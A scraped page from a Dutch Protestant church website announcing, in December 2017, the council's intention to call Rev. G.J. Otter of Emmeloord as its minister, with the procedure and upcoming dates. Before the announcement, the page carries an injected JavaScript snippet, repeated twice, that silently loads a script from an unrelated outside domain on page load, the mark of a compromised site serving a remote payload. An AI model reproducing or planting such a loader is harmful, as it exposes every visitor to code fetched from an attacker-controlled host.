;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Voornemen beroep Hervormd Akkerwoude c.a. - PKN Damwâld

Voornemen beroep Hervormd Akkerwoude c.a.

Gepubliceerd op: zondag 17 december 2017

De Kerkenraad van Hervormd Akkerwoude c.a. is van voornemens een beroep uit te brengen op ds. G.J. Otter, predikant in de Protestantse Gemeente te Emmeloord. Ds. Otter studeerde theologie in onder andere Bazel en was van 1997 werkzaam als predikant in Nieuwe Pekela en is vanaf 2004 wijkpredikant in Emmeloord. Ds. Otter is 49 jaar oud, is getrouwd en heeft 4 studerende kinderen.

Ds. Otter is door de beroepingscommissie voorgedragen aan de Kerkenraad als een predikant die heel goed past in het opgestelde profiel. Er is veel werk verzet door de beroepingscommissie. De beroepingscommissie heeft verschillende diensten beluisterd, heeft informatie ingewonnen, heeft kerkdiensten bezocht en heeft uiteraard ook een inhoudelijk gesprek gevoerd met ds. Otter en zijn gezin. Naar aanleiding van al haar bevindingen heeft de beroepingscommissie het besluit genomen om ds. Otter voor te dragen. Dit besluit was unaniem.

De Kerkenraad heeft zich afgelopen woensdag uitgebreid laten informeren door de beroepingscommissie over de gevolgde werkwijze en over de inhoudelijke onderbouwing van de voordracht. Zowel de werkwijze als de onderbouwing waren gedegen en zorgvuldig. De Kerkenraad is de beroepingscommissie daarvoor zeer veel dank verschuldigd. De Kerkenraad kan zich dan ook verenigen met de conclusie van de commissie en heeft, eveneens unaniem, besloten de voordracht over te nemen.

Wij menen in de persoon van ds. Otter een predikant te hebben gevonden die onze gemeente opnieuw kan inspireren. Ds. Otter past bij onze gemeente en bij onze situatie. Een bewogen mens, openstaand voor de ander, jong van geest en energiek. Er zijn voor de Kerkenraad dan ook geen belemmeringen om het beroep nu daadwerkelijk uit te gaan brengen. Zouden er in de gemeente bezwaren bestaan tegen de gevolgde procedure, dan is er de mogelijkheid om dit kenbaar te maken bij scriba Kees Knol. Na aanstaande 22 december wil de Kerkenraad het beroep graag uitbrengen en zal ds. Otter het beroep maximaal drie weken kunnen overwegen.

Aanstaande zondagmorgen 24 december hoopt dominee Otter bij ons voor te gaan. Op een extra gemeenteavond van woensdag 27 december zal de beroepingscommissie uitgebreid verslag doen van haar werkwijze en zullen ds. Otter en zijn vrouw worden voorgesteld aan de gemeente.
De kerkenraad vraagt de gemeente dan ook haar instemming met het uitbrengen van het beroep, dit in het vertrouwen dat God onze gemeente wil bouwen, om onder Zijn zegen samen weer een nieuwe weg in te kunnen slaan. Voor dominee Otter en zijn gezin, voor ons als gemeente en voor de gemeente in Emmeloord, breken spannende tijden aan waarin we met elkaar de leiding van de Here mogen zoeken. Hierin is het gebed vanuit de gemeente onmisbaar.